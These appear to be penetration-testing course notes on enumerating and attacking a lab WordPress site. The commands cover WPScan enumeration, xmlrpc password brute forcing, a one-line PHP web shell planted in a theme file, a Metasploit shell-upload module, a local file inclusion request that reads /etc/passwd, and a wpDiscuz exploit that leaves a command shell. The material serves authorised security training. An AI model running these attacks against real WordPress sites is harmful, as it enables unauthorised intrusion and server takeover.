Content Management Systems (CMS)

WordPress - Discovery & Enumeration

Search for robots.txtor try accessing /wp-admin or /wp-login.

WordPress stores its plugins in the wp-content/plugins directory. This folder is helpful to enumerate vulnerable plugins. Themes are stored in the wp-content/themes directory. These files should be carefully enumerated as they may lead to RCE.

There are five types of users on a standard WordPress installation.

1. Administrator: This user has access to administrative features within the website. This includes adding and deleting users and posts, as well as editing source code.

2. Editor: An editor can publish and manage posts, including the posts of other users.

3. Author: They can publish and manage their own posts.

4. Contributor: These users can write and manage their own posts but cannot publish them.

5. Subscriber: These are standard users who can browse posts and edit their profiles.

Getting access to an administrator is usually sufficient to obtain code execution on the server. Editors and authors might have access to certain vulnerable plugins, which normal users don’t.

Enumeration

curl -s http://blog.inlanefreight.local | grep WordPress

<meta name="generator" content="WordPress 5.8" /

curl -s http://blog.inlanefreight.local/ | grep themes

<link rel='stylesheet' id='bootstrap-css'  href='http://blog.inlanefreight.local/wp-content/themes/business-gravity/assets/vendors/bootstrap/css/bootstrap.min.css' type='text/css' media='all' />

curl -s http://blog.inlanefreight.local/ | grep plugins

From the output above, we know that the Contact Form 7 and mail-masta plugins are installed. The next step would be enumerating the versions.

Browsing to http://blog.inlanefreight.local/wp-content/plugins/mail-masta/ shows us that directory listing is enabled and that a readme.txt file is present. These files are very often helpful in fingerprinting version numbers.

Enumerating Users

A valid username and an invalid password results in the following message:

However, an invalid username returns that the user was not found.

This makes WordPress vulnerable to username enumeration, which can be used to obtain a list of potential usernames.

WPScan

WPScan is an automated WordPress scanner and enumeration tool. It determines if the various themes and plugins used by a blog are outdated or vulnerable. It’s installed by default on Parrot OS but can also be installed manually with gem.

sudo gem install wpscan

WPScan is also able to pull in vulnerability information from external sources. We can obtain an API token from WPVulnDB, which is used by WPScan to scan for PoC and reports. The free plan allows up to 75 requests per day. To use the WPVulnDB database, just create an account and copy the API token from the users page. This token can then be supplied to wpscan using the --api-token parameter.

The --enumerate flag is used to enumerate various components of the WordPress application, such as plugins, themes, and users. By default, WPScan enumerates vulnerable plugins, themes, users, media, and backups. However, specific arguments can be supplied to restrict enumeration to specific components.

For example, all plugins can be enumerated using the arguments --enumerate ap

sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token dEOFB<SNIP>

Attacking WordPress

There are several ways we can abuse built-in functionality to attack a WordPress installation. We will cover login brute forcing against the wp-login.php page and remote code execution via the theme editor. These two tactics build on each other as we need first to obtain valid credentials for an administrator-level user to log in to the WordPress back-end and edit a theme.

Login Bruteforce

WPScan can be used to brute force usernames and passwords. The scan report in the previous section returned two users registered on the website (admin and john). The tool uses two kinds of login brute force attacks, xmlrpc and wp-login. The wp-login method will attempt to brute force the standard WordPress login page, while the xmlrpc method uses WordPress API to make login attempts through /xmlrpc.php. The xmlrpc method is preferred as it’s faster.

sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local

The --password-attack flag is used to supply the type of attack. The -U argument takes in a list of users or a file containing user names. This applies to the -P passwords option as well. The -t flag is the number of threads which we can adjust up or down depending.

Code Execution

With administrative access to WordPress, we can modify the PHP source code to execute system commands.

After login, Click on Appearance on the side panel and select Theme Editor. This page will let us edit the PHP source code directly.

An inactive theme can be selected to avoid corrupting the primary theme.

Click on Select after selecting the theme, and we can edit an uncommon page such as 404.php to add a web shell.

system($_GET[0]);

The code above should let us execute commands via the GET parameter 0. We add this single line to the file just below the comments to avoid too much modification of the contents.

Click on Update File at the bottom to save. We know that WordPress themes are located at /wp-content/themes/<theme name>. We can interact with the web shell via the browser or using cURL. As always, we can then utilize this access to gain an interactive reverse shell and begin exploring the target.

curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id

The wp_admin_shell_upload module from Metasploit can be used to upload a shell and execute it automatically.

use exploit/unix/webapp/wp_admin_shell_upload

Many Metasploit modules (and other tools) attempt to clean up after themselves, but some fail. During an assessment, we would want to make every attempt to clean up this artifact from the client system and, regardless of whether we were able to remove it or not, we should list this artifact in our report appendices. At the very least, our report should have an appendix section that lists the following information:

• Exploited systems (hostname/IP and method of exploitation)

• Compromised users (account name, method of compromise, account type (local or domain))

• Artifacts created on systems

• Changes (such as adding a local admin user or modifying group membership)

Leveraging Known Vulnerabilities

We can use the waybackurls tool to look for older versions of a target site using the Wayback Machine. Sometimes we may find a previous version of a WordPress site using a plugin that has a known vulnerability. If the plugin is no longer in use but the developers did not remove it properly, we may still be able to access the directory it is stored in and exploit a flaw.

Vulnerable Plugins - mail-masta

Since 2016 it has suffered an unauthenticated SQL injection and a Local File Inclusion.

curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

Vulnerable Plugins - wpDiscuz

Based on the version number (7.0.4), this exploit has a pretty good shot of getting us command execution.

The exploit script takes two parameters: -u the URL and -p the path to a valid post.

python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1

The exploit as written may fail, but we can use cURL to execute commands using the uploaded web shell. We just need to append ?cmd= after the .php extension to run commands which we can see in the exploit script.

curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id

In this example, we would want to make sure to clean up the uthsdkbywoxeebg-1629904090.8191.phpfile and once again list it as a testing artifact in the appendices of our report.